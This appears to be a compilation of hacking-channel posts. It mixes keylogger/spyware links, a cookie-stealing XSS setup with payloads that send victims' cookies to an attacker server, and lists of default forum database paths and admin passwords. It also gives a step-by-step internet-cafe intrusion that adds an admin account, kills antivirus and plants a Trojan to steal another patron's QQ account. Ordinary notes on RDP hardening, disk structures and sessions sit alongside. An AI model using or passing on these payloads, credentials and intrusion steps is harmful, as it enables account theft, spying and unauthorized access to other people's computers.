▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑best 2020 keylogger -apps
pinterest.com/undercode_Testing


1) http://www.spyrix.com/spyrix-free-keylogger.php

2) https://kidinspector.com/

3) http://www.actualkeylogger.com/

4) https://store.payproglobal.com/r?u=https://www.refog.com&a=4913

5) https://www.iwantsoft.com/

6) https://kidlogger.net/?lang=en

8) https://www.logixoft.com/en-us/index

9) https://www.ardamax.com/keylogger/ free

10) https://sourceforge.net/projects/basickeylogger/

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PHP Cookie Stealing Scripts for use in XSS
t.me/undercodeTesting

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) On the remote attacker machine, start the webserver (Apache2 in example):

> sudo service apache2 start

2) Git clone the repo locally and then push the chosen "Cookie stealer" PHP script from local host to the attacking machine
git clone https://github.com/RxSec/CookieHeist

3) cd CookieHeist

sudo scp cookiestealer-simple.php username@AttackMachine:/var/www/html/

4) sudo scp log.txt username@AttackMachine:/var/www/html/

🦑AWS Version:

scp -i AWS-Key.pem cookiesteal-simple.php ec2-user@ec2[YOUR IP].us-east-2.compute.amazonaws.com:~/.

sudo mv cookiestealer-simple.php /var/www/html/
Example: http://[Attacker Webserver]/cookiesteal-simple.php

🦑Setting Permissions:
Figure out which user is owning httpd process using the following command:

ps aux | grep httpd
Output should be similar to this:

ec2-user 1569 0.0 0.1 12840 1064 pts/0 S+ 17:55 0:00 grep httpd
So now you know the user who is trying to write files, which is in this case ec2-user You can now go ahead and set the permission for directory where your php script is trying to write something:

sudo chown ec2-user:ec2-user /var/www/html/

sudo chmod 755 /var/www/html/
XSS Payload Examples:

<script javascript:text>document.location="http://[Attacker Webserver]cookiesteal-simple.php?c=" + document.cookie + "&t=Alert"; </script>
<script>document.location='http://[Attacker Webserver]/cookiesteal-v.php?cookie=' + document.cookie</script>
<img src=x onerror=this.src='http://[Attacker Webserver]/cookiesteal-v.php?cookie='+document.cookie>

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The default database of various website programs :
t.me/UndercodeTesting

Dynamic network:
default database
/data/dvbbs7.mdb
backup database
/databackup/dvbbs7.mdb
foreground:
user name: admin
password: admin888
background:
user name: admin
password: admin888
－－－－－－－－－－－－－ -
BBSXP:
default database
database / bbsxp.mdb
_______________
LeadBBS
default database
Data / LeadBBS.mdb
username: Admin
password: admin
_______________
6kbbs
default database
db / 6k.asp
username: admin
password: 6kadmin
------- ----------------------------------
data / dvbbs7.mdb Dongwang forum database
Foreground: username: admin password: admin888
background: username: admin password: admin888
/databackup/dvbbs7.mdb;
dongwang forum database /
bbs / databackup / dvbbs7.mdb dongwang forum database / data / zm_marry.asp ized database
/admin/data/qcdn_news.mdb Chong Qing article management system database
/data/qcdn_news.mdb; Chong Qing article management system database
/firend.mdb Dating Service database
/database/newcloud6.mdb new cloud database management system 6.0
/ database /% 23newasp.mdb new cloud website system / database / powereasy4.mdb Dongyi
website management system 4.03 database /
blogdata / l-blog.mdb l-blog v1.08
database
/ database / bbsxp.mdb bbsxp forum database / bbs / database /bbsxp.mdb bbsxp forum database /
access / sf2.mdb snowman forum program v2.0 database / data /
leadbbs.mdb leadbbs forum v3.14 database
username: admin password: admin
/bbs/data/leadbbs.mdb leadbbs forum v3.14 database /
bbs / access / sf2.mdb snowman forum program v2.0 database
/ blog / blogdata / l-blog.mdb l-blog v1.08 database /
fdnews.asp Liuhe dedicated bbs database
/ bbs / fdnews.asp Liuhe dedicated bbs database /
admin / ydxzdate.asa raindrop download system v2.0 + sp1 database
/ data /
down.mdb Download system xp v1.3 database / database / database.mdb
Xuanxi download system v3.1 database /
db / xzjddown.mdb lhdownxp download system database /
db / play.asp Entertainment Pioneer Forum v3.0 database /
mdb.asp Jingyun Download system v1.2 database
/admin/data/user.asp shock cloud download system v3.0 database
/data_jk/joekoe_data.asp Joe off 6.0 database
/data/news3000.asp boiling outlook news system v1.1 database
/ data / appoen .mdb Huixin News System 4.0 Database / data /
12912.asp Flying Dragon Article Management System v2.1 Database
/database.asp Dynamic Needs Download Management System v3.5
/download.mdb Aberdeen Software Download Management System v2.3
/dxxobbs/mdb/dxxobbs.mdb dxxobbs Forum Database
db / 6k.asp 6kbbs Username: admin Password: 6kadmin
/ database / snowboy.mdb Snow boy forum default background admin / admin_index.asp
/database/#mmdata.mdb Yishuang community /
starark.asp poor dragon asp website generation system

written by Under code
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 3389 port detailed - Why used for hack ?
youtube.com/undercode

3389 originally refers to the 3389 port of the computer, which is generally used to refer to the remote desktop and can be modified. It is not a Trojan horse program, but if not necessary, the hacker base recommends shutting down the service. Originally refers to the 3389 port of the computer

🦑 Because it belongs to the initial port of the remote desktop of WINDOWS [can be modified]

3389 is generally used to refer to the remote desktop

Microsoft's remote desktop is set up to facilitate the majority of computer administrators to remotely manage their own computers,

But as long as there is a management password, 3389 can provide services for anyone with a management password ...

Most hackers like to open a 3389 on the chicken,

Because 3389 is the normal service of the system, it is also very convenient to use.

It can achieve the same effect as the remote control software such as Grey Pigeon, the main thing is that it is a normal service ...

3389 is easy to get through various scanning tools (such as superscan \ x-scan, etc.). Because some computer users lack security awareness, they often leave the administrator \ new account password blank, so rookies can use mstsc.exe to log in to others in GUI mode In order to prevent others from using 3389 to log in to the computer, it is best to set a password for each account or close the port with a firewall. 3389 is recommended to close.

🦑To close port 3389:

Firstly, port 3389 is the port opened by the remote management terminal of windows. It is not a Trojan horse program. Please first determine whether the service is opened by yourself. If it is not necessary, it is recommended to close the service.

win8 server start-> program-> management tools-> find Terminal Services service item in the service, select the property option to change the startup type to manual, and stop the service.

win8 start-> Settings-> Control Panel-> Administrative Tools-> find Terminal Services service item in the service, select the property option to change the startup type to manual, and stop the service.

🦑How to close windows Right-click on my computer and select Properties-> Remote, and remove the ticks in the two options box of Remote Assistance and Remote Desktop.

Close port 3389 through the registry

start operation

Enter regedit to open the registry

[HKEY_LOCAL_MACHINE \ System \ control \ Terminalserver \ wds \ rdpwd \ tds \ tcp branch, select the key value named portnumber, and change its 3389 to other (such as 1234). Look at my operation. There are 2 controls, namely controlSET001 and controlSET002. One by one advanced controlSET001 then controlSET002

Below we are looking at currentcontrolset

[HKEY_LOCAL_MACHINE \ System \ currentcontrolset \ control \ Terminalserver \ winstations \ RDP-Tcp \ PortNumber branch should have one or many similar subkeys, the same change his value 3389 to other (such as 1234)

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Commands and techniques used for Internet cafe intrusion
Pinterest.com/undercode_Testing

>There are many Internet cafe management software, but most of them have one or another loophole, so there are many techniques for cracking Internet cafe software and Internet cafe software,

>you can surf the Internet for free, you can use the "command prompt" method, you can use administrator permissions, and so on. As a result, Internet cafes have become the most severe places for loss of virtual property. But as long as the level of the Internet cafe administrator is sufficient, this situation can be avoided. Let me tell you how I used to get the MMQQ number in Internet cafes. It is a little complicated. The hacker base is mainly to let you know some commands used during hacking.


🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :


The first step: first determine the IP of the computer used by the MM. The number and IP address of the computer in the Internet cafe are usually the same or higher. For example, the computer with the number 20 in the Internet cafe is generally 192.168.0.20 or 192.168.0.21 (192.168 .0.1 is left to the router), not only that, the machine name is also regular, the machine name of computer 20 is usually Wangba20, so as long as you know the computer used by MM, and then enter the "command prompt", Ping Wangba20 can get the IP address , Such as 192.168.0.20.

> Step 2: With the IP, you can start to connect to the MM computer. Because the computers in the Internet cafe mostly use Windows 2000 that has not been patched, and the user name for logging in to the computer is mostly an empty password in the form of "user number" Form, so at the "command prompt", enter net use //192.168.0.20/ipc$ "" / user: "" and net use //192.168.0.20/ipc$ "" / user: "user20" to establish a connection .

> After the connection is successful, you must close the anti-virus software on the other computer, right-click "My Computer", select "Management", right-click "Computer Management (Local)" in the pop-up window, and select "Connect to another computer" ", Connect to 192.168.0.20, start the" Telnet "service (" Computer Management "can directly manage remote computers).

-Step 3: Enter two commands under the "Command Prompt" to create a new user20 user on this machine and add it to the administrator group.

net user user20 / add

net localgroup administrators user20 / add

-Step 4: Go to C: \ Winnt \ System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties", check "Run as other user" (to Run the program as another user). Run the shortcut CMD, after the "Run as another user" window pops up, enter "user20" and press Enter.

-Step 5: Log in to the MM computer with telnet 192.168.0.20, and then download a command-line killing software from the Internet, such as knlps, etc., and close the anti-virus software process on telnet.

-Step 6: You can download a Trojan now, and use the "copy Trojan name.exe //192.168.0.20/admin$" method to copy the Trojan to the MM computer. Then use net time //192.168.0.20 to get the time of the MM computer, for example, 4 pm, and finally use "at //192.168.0.20 time Trojan name.exe", such as "at //192.168.0.20 16:02 Trojan name The .exe "command runs the Trojan at the specified time.

🦑 With a Trojan, you can naturally know the QQ number used by MM.

How about it, is it dangerous in Internet cafes? However, you can rest assured that not all Internet cafes are like this. Most Internet cafes are still very safe. As long as you use QQ or other software, you can select "Internet cafe mode" (Click "Login Mode" option appears after "Advanced Settings".


written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Basic knowledge of data record recovery
t.me/UndercodeTesting


🦑 Let's start with the data structure of the hard disk.

Hard disk data structure

We have no way to use a hard disk when we first buy it. You need to partition and format it, and then install the operating system before you can use it. Take the 9x / Me series that we have been using until now, we generally divide the hard disk into five parts: the main boot sector, the operating system boot sector, FAT, DIR and Data (of which only the main boot sector is the only one , The others increase with the number of your partitions).

Master boot sector

The main boot sector is located on track 0 cylinder 0 cylinder 1 sector of the entire hard disk, including the hard disk main boot record MBR (Main Boot Record) and partition table DPT (Disk Partition Table). The role of the master boot record is to check whether the partition table is correct and determine which partition is the boot partition, and transfer the startup program of the partition (that is, the operating system boot sector) to the memory for execution at the end of the program. As for the partition table, many people know that starting with 80H or 00H and ending with 55AAH, a total of 64 bytes, is located at the very end of the sector. It is worth mentioning that the MBR is generated by a partition program (such as Fdisk.exe for DOS), and this sector may be different for different operating systems. If you have this intention, you can write one yourself, as long as it can complete the aforementioned tasks, which is why you can achieve multi-system startup A lot of boot sector viruses).

Operating system boot sector

OBR (OS Boot Record) is the boot sector of the operating system, usually located on the 0 track 1 cylinder 1 sector of the hard disk (this is for DOS, for those systems that boot in multiple boot mode are located in the corresponding primary partition The first sector of the extended partition) is the first sector that the operating system can directly access. It also includes a boot program and a partition parameter record table called BPB (BIOS Parameter Block). In fact, each logical partition has an OBR, and its parameters vary depending on the size of the partition and the type of operating system. The main task of the boot program is to determine whether the first two files in the root directory of the partition are the boot files of the operating system (such as MSDOS or IO.SYS and MSDOS.SYS of Win9x / Me originating from MSDOS). If so, the first file is read into memory and control is given to the file. The BPB parameter block records the start sector, end sector, file storage format, hard disk media descriptor, root directory size, FAT number, size of allocation unit (also known as cluster) in the partition, etc. Important parameters. OBR is generated by an advanced formatter (eg Format.com for DOS).

File allocation table

FAT (File Allocation Table) is the file allocation table of DOS / Win9x system. For data security, FAT generally do two, the second FAT is the backup of the first FAT, the FAT area is immediately after the OBR , The size of which is determined by the size of the partition and the size of the file allocation unit. There are always many choices about the format of FAT. Microsoft's DOS and Windows use the familiar FAT12, FAT16 and FAT32 formats, but there is no other format of FAT other than this, like Windows NT, OS / 2, UNIX / Linux, Novell Etc. have their own file management methods.

Directory area

DIR is the abbreviation of Directory, that is, the root directory area. DIR is immediately after the second FAT table. Only FAT cannot locate the location of the file on the disk. FAT must cooperate with DIR to accurately locate the location of the file. DIR records the starting unit of each file (directory) (this is the most important), the file attributes, etc. When locating the file location, the operating system can know the specific location and size of the file on the disk according to the starting unit in the DIR and the FAT table. After the DIR area, it is the real data storage area, namely the DATA area.

Data area

Although DATA occupies most of the space of the hard disk, it does not have the previous parts. For us, it can only be some boring binary code, which makes no sense. One thing to note here is that what we usually call a formatter (referring to advanced formatting, such as the Format program under DOS) does not clear the data in the DATA area, but only rewrites the FAT table, as for the partition The hard disk has only modified the MBR and OBR. Most of the data in the DATA area has not been changed, which is why many hard disk data can be repaired. But even so, if one of the MBR / OBR / FAT / DIR is destroyed, it is enough for our so-called DIY veterans who have been busy for a long time ... What needs to be reminded is that if you regularly clean up the disk, then your data area The data may be continuous, so even if the MBR / FAT / DIR are all broken, we can use disk editing software (such as DiskEdit under DOS). As long as we find the starting storage location of a file, then this file may be Recovery (Of course, this requires a premise, that is, you did not overwrite this file ...).

🦑 Hard disk partition

The concept of partitions we usually talk about is nothing more than three types: primary partition, extended partition, and logical partition.

The main partition is a relatively simple partition, usually located in the frontmost area of the hard disk, forming a logical C disk. In the primary partition, no other logical disks are allowed.

The concept of extended partitions is more complicated, and is also the main cause of confusion between partitions and logical disks. Since the hard disk only reserves 64 bytes of storage space for the partition table, and the parameters of each partition occupy 16 bytes, the total data of 4 partitions can be stored in the main boot sector. The operating system only allows 4 partitions of data to be stored. If a logical disk is a partition, the system only allows up to 4 logical disks. For specific applications, 4 logical disks often cannot meet actual needs. In order to build more logical disks for use by the operating system, the system introduced the concept of extended partitions.


written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The basic knowledge of data recovery is almost introduced to you.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Talk about the specific role of session
t.me/UndercodeTesting


1) First of all, the session is implemented by language, has nothing to do with the web server, such as php session is implemented by php language.

2) Second, the content of the session is stored on the server, but everyone knows that the session is often used for authentication to identify each user. How does it correspond to the client?

> In fact, it is very simple. When the user submits a browsing request, the cookie carries a session field, php is SESSIONID. In this way, the server knows that the requester's session is stored in the SESSIONID, and the corresponding data can be read. Where did this SESSIONID come from?

3) Again, the session has a default timeout, I remember asp seems to be 20 minutes, not sure. So if you cross the site and you get the cookie after a long time, you can't log in. This is also the reason why it has been said that the Dongwang forum cross-sited and you can't log in to the background. Isn't it legend that the session cannot be forged? Because there were no tools like SessionIE at that time to keep the session from expiring. At that time, if the administrator happened to be cross-site and did not log out in the background, you can log in to the background using this cookie, because your sessionid has not expired.

4) Also, tools like SessionIE are not omnipotent. If the web program is well written, when the cross-site user logs out of the system, the cookie and session are destroyed, and the attacker will not be able to continue the session state. Because the session corresponding to this sessionid no longer exists on the server side, although you submitted the sessionid, there is no corresponding session data on the server side. The server program cannot obtain the session content required for authentication, and naturally cannot pass the authentication.

5) Finally, such tools can be written in cgi programs using languages ​​such as php that support sockets. Asp's XmlHTTP should be subject to cross-domain restrictions. That is to say, I put a php program on the broiler, read the cookie list regularly, and then use the curl library to load the cookie to access the corresponding url, keep the state is not lost, so you can turn off your PC.

6) In the end, there is nothing mysterious or bizarre about the session. Its essence is just a piece of data saved on the server side. This data has a unique ID. The ID server will tell the client through a set cookie. Then, when the client requests this ID, the server session can be associated with the client.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁